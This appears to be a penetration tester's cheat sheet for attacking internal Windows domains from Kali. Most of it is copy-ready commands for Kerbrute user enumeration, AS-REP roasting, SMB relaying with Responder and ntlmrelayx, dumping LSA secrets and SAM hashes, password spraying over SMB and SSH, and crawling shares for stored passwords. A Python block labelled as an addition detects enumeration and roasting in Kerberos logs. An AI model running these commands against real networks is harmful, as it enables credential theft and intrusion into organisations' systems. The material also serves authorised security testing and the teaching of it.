Internal (Kali)

Starting with some Nmap scans/scripts, we can find plenty of additional information for more targeted attacks and for finding other attack paths/vectors. Then, depending on whether we were given user credentials for a "compromised user" approach, we can go down other paths; either way we want to run all of these checks both with and without credentials.


User Enumeration

If we have not been given user credentials, we can try to find some with Kerbrute and GetNPUsers.py. These methods can be loud but are still effective.

wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
./kerbrute_linux_amd64 userenum -d DOMAIN --dc DC-IP USERLIST.txt -v -o Outfile.txt
GetNPUsers.py DOMAIN/ -usersfile USERLIST.txt -dc-ip DC-IP -no-pass
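On the defensive side of this enumeration, an added example that is not part of the original notes: detection logic for Kerbrute-style user enumeration and GetNPUsers-style AS-REP roasting, run over constructed Windows Security Event ID 4768 records. The field names follow the 4768 schema; the sample records, the 5-hits-in-60-seconds threshold and the helper names are assumptions for illustration.

```python
"""Detection logic for Kerbrute-style user enumeration and AS-REP roasting, run
over constructed records modelled on Windows Security Event ID 4768 (TGT requested)."""
from collections import defaultdict
from datetime import datetime, timedelta

UNKNOWN_PRINCIPAL, SUCCESS = "0x6", "0x0"  # Status: KDC_ERR_C_PRINCIPAL_UNKNOWN / ok
NO_PREAUTH, RC4_HMAC = "0", "0x17"         # PreAuthType 0 and RC4 TicketEncryptionType


def ev(time, user, ip, status, preauth=None, etype=None):
    failed = status != SUCCESS  # failed requests carry no pre-auth/etype detail
    return {"time": time, "EventID": 4768, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "PreAuthType": preauth or ("-" if failed else "2"),
            "TicketEncryptionType": etype or ("0xffffffff" if failed else "0x12")}


# Constructed sample: a normal logon, a wordlist burst from 10.0.0.77, a roastable TGT, a typo
SAMPLE_EVENTS = [
    ev("2024-01-10T09:00:00", "jsmith", "10.0.0.50", SUCCESS),
    ev("2024-01-10T09:00:01", "aaron", "10.0.0.77", UNKNOWN_PRINCIPAL),
    ev("2024-01-10T09:00:01", "abby", "10.0.0.77", UNKNOWN_PRINCIPAL),
    ev("2024-01-10T09:00:02", "adam", "10.0.0.77", UNKNOWN_PRINCIPAL),
    ev("2024-01-10T09:00:03", "alan", "10.0.0.77", UNKNOWN_PRINCIPAL),
    ev("2024-01-10T09:00:03", "alex", "10.0.0.77", UNKNOWN_PRINCIPAL),
    ev("2024-01-10T09:00:04", "svc_backup", "10.0.0.77", SUCCESS, NO_PREAUTH, RC4_HMAC),
    ev("2024-01-10T09:30:00", "old.user", "10.0.0.50", UNKNOWN_PRINCIPAL),
]


def detect_user_enumeration(events, threshold=5, window_seconds=60):
    """Map source IP -> hit count when >= threshold unknown-user failures share a window."""
    by_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4768 and e["Status"] == UNKNOWN_PRINCIPAL:
            by_ip[e["IpAddress"]].append(datetime.fromisoformat(e["time"]))
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over the sorted timestamps
            while t - times[start] > timedelta(seconds=window_seconds):
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = end - start + 1
                break
    return flagged


def detect_asrep_roasting(events):  # (ip, user) pairs: TGT issued with no pre-auth, RC4 etype
    return sorted({(e["IpAddress"], e["TargetUserName"]) for e in events
                   if e["EventID"] == 4768 and e["Status"] == SUCCESS
                   and e["PreAuthType"] == NO_PREAUTH
                   and e["TicketEncryptionType"] == RC4_HMAC})
```

Both checks need failure auditing for "Audit Kerberos Authentication Service" enabled on the domain controllers, otherwise the 0x6 failures are never written.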

SMB Null Sessions

I like to use SMBCrunch (SMBHunt.pl) and NetExec.

git clone https://github.com/Raikia/SMBCrunch.git && cd SMBCrunch
sudo ./smbhunt.pl -i ../445.txt
sudo netexec smb <target-ip> -u "" -p "" --shares
  • List shares over a null session with smbclient (-N skips the password prompt):

sudo smbclient -L //target -U "" -N

SMB Relays

If SMB signing is not required on multiple machines, we can attempt to abuse SMB relays with Responder, ntlmrelayx (from Impacket), and proxychains.

  1. Disable SMB and HTTP in Responder.conf (/etc/responder/Responder.conf):

sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf
sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf

  2. Change the proxychains config (/etc/proxychains4.conf) to use port 1080, the SOCKS port ntlmrelayx listens on:

sudo sed -i 's/9050/1080/g' /etc/proxychains4.conf

  3. Use NetExec to generate a list of hosts where SMB signing is not required (--gen-relay-list):

sudo netexec smb up-hosts.txt --gen-relay-list relay.txt

  4. Start Responder:

sudo python3 /usr/share/responder/Responder.py -I eth0 -PDv --lm

  5. Run ntlmrelayx in a new window/tab while Responder is running:

sudo python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf relay.txt -socks -smb2support -i -of relayed-hashes.txt

Once we have captured relays, we can try to crack the captured hashes; while they crack, we can use the relayed SOCKS sessions through NetExec.

  • View shares hosted on the target machine

sudo proxychains4 netexec smb ip -u user -p '' --shares

  • Dump LSA

sudo proxychains4 netexec smb ip -u user -p '' --lsa

  • Dump SAM hashes

sudo proxychains4 netexec smb ip -u user -p '' --sam

General Enumeration

Finding the Domain Controller IP. These aren't guaranteed, but they work in most cases.

  • Using NSLookup

nslookup -type=SRV _ldap._tcp.dc._msdcs.<domain>
  • Using DIG

dig _ldap._tcp.dc._msdcs.<domain> SRV
  • Checking /etc/resolv.conf

cat /etc/resolv.conf

Web Services

  • Look at all http/https pages for login pages, information disclosure, default login credentials, robots.txt, and other directories.

  • Ffuf

    • Will need a fuzzing wordlist, such as SecLists

sudo ffuf -recursion -mc all -ac -c -u https://domain/FUZZ -w wordlist.txt
sudo ffuf -recursion -mc all -ac -c -e .htm,.shtml,.php,.html,.js,.txt,.zip,.bak,.asp,.aspx,.xml -w wordlist.txt -u https://domain/FUZZ -fc 400,401,403,404,406,500,502 > domain.txt

FTP

Checking if FTP is open, and if anonymous login is enabled.

sudo nmap -p 21 --script ftp-anon -iL 21.txt

SSH

Checking if SSH is open and if it takes password authentication.

sudo nmap -p 22 --script ssh-auth-methods -iL 22.txt

Password Spraying

SMB

git clone https://github.com/absolomb/smbspray.git && cd smbspray
python3 smbspray.py -u users.txt -p passwords.txt -ip DC-IP

SSH

hydra -L users.txt -P passwords.txt ssh://IP

Post Exploitation

Once we have obtained credentials, we can find even more information. I like to gather it with LDAPDomainDump, BloodHound (bloodhound-python), and MANSPIDER.

Bloodhound / Bloodhound-Python

sudo bloodhound-python -u USER -p PASSWORD -ns DNS-SERVER-IP -d DOMAIN -c All

Once we have the .json files, we can ingest them into BloodHound to look for domain admins, Kerberoastable accounts, and more.

LDAPDomainDump

sudo ldapdomaindump -u DOMAIN\\USER -p PASSWORD IP

MANSPIDER

Crawl network shares to find any helpful info, such as files with cleartext passwords, password databases, and more.

  • Install

pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
  • Search hostname/IP for files with "passw" in the name:

manspider TARGET -f passw -d DOMAIN -u USER -p 'PASSWORD'
  • Search for documents containing passwords

manspider TARGET -c passw -d DOMAIN -u USER -p 'PASSWORD'
